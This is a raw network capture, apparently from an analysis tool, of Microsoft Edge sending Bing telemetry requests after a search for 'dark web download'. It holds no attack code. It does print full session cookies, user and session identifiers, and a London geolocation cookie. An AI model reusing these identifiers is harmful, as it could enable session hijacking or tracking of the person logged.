user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=4&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: _RwBf=r=0&ilt=4&ihpd=0&ispd=4&rc=12&rb=0&gb=0&rg=200&pc=9&mtu=0&rbb=0&g=0&cid=&clo=0&v=4&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:16.9614118+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=12&RB=0&GB=0&RG=200&RP=9

Response

HTTP/2.0 200

cache-control: private
content-length: 1
content-type: text/html
content-encoding: br
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 67502a4d95bf4cbe8bb026ed3b8b6119
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-p7I4NUQLrpI1pV04YFQ0A/Vi2e/pVwz5FtNiirjauGI='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: 559A68D72AA743FB94D81A8FA7B64963 Ref B: LON601060103031 Ref C: 2024-12-04T10:09:17Z
date: Wed, 04 Dec 2024 10:09:17 GMT
set-cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B; expires=Mon, 29-Dec-2025 10:09:17 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100917; domain=.bing.com; expires=Mon, 29-Dec-2025 10:09:17 GMT; path=/; secure; HttpOnly; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306957.7f235d1
GET

https://www.bing.com/fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22}]

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=4&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: _RwBf=r=0&ilt=4&ihpd=0&ispd=4&rc=12&rb=0&gb=0&rg=200&pc=9&mtu=0&rbb=0&g=0&cid=&clo=0&v=4&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:16.9614118+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=12&RB=0&GB=0&RG=200&RP=9

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:17 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306957.7f235cd
GET

https://www.bing.com/fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22correlationId%22%3A%2267502a4c5fc14ff08d3cba4e30517d13%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1733306947882%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%2267502a4c5fc14ff08d3cba4e30517d13%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1733306947882%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306947898%2C%22Name%22%3A%22Show%22%2C%22FID%22%3A%2214utojb6_14yb1dlu%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306947898%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306947898%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2222000%22%5D%2C%22isWin11OrHigher%22%3A%22true%22%2C%22fullOsBuild%22%3A%2210.0.22000%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306947916%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1733306948110%2C%22Name%22%3A%221%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22SuppressingFeature%22%3A%22lgVidAns%22%2C%22T%22%3A%22CI.LeftGutterUtility%22%2C%22TS%22%3A1733306948124%2C%22Name%22%3A%22LGSuppressed%22%2C%22FID%22%3A%22lgVidAns%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22correlationId%22%3A%2267502a4c5fc14ff08d3cba4e30517d13%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1733306947882%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%2267502a4c5fc14ff08d3cba4e30517d13%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1733306947882%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306947898%2C%22Name%22%3A%22Show%22%2C%22FID%22%3A%2214utojb6_14yb1dlu%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306947898%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306947898%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2222000%22%5D%2C%22isWin11OrHigher%22%3A%22true%22%2C%22fullOsBuild%22%3A%2210.0.22000%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306947916%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1733306948110%2C%22Name%22%3A%221%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22SuppressingFeature%22%3A%22lgVidAns%22%2C%22T%22%3A%22CI.LeftGutterUtility%22%2C%22TS%22%3A1733306948124%2C%22Name%22%3A%22LGSuppressed%22%2C%22FID%22%3A%22lgVidAns%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: _RwBf=r=0&ilt=4&ihpd=0&ispd=4&rc=12&rb=0&gb=0&rg=200&pc=9&mtu=0&rbb=0&g=0&cid=&clo=0&v=4&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:16.9614118+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=12&RB=0&GB=0&RG=200&RP=9
cookie: dsc=order=Video
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=4&HV=1733306948&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:17 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306957.7f235cf
GET

https://www.bing.com/fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: _RwBf=r=0&ilt=4&ihpd=0&ispd=4&rc=12&rb=0&gb=0&rg=200&pc=9&mtu=0&rbb=0&g=0&cid=&clo=0&v=4&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:16.9614118+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=12&RB=0&GB=0&RG=200&RP=9
cookie: dsc=order=Video
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=4&HV=1733306948&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:17 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306957.7f2348a
GET

https://www.bing.com/fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22conv%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2210%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22realestate%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialNotEnoughPoints%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22conv%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2210%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22realestate%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialNotEnoughPoints%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
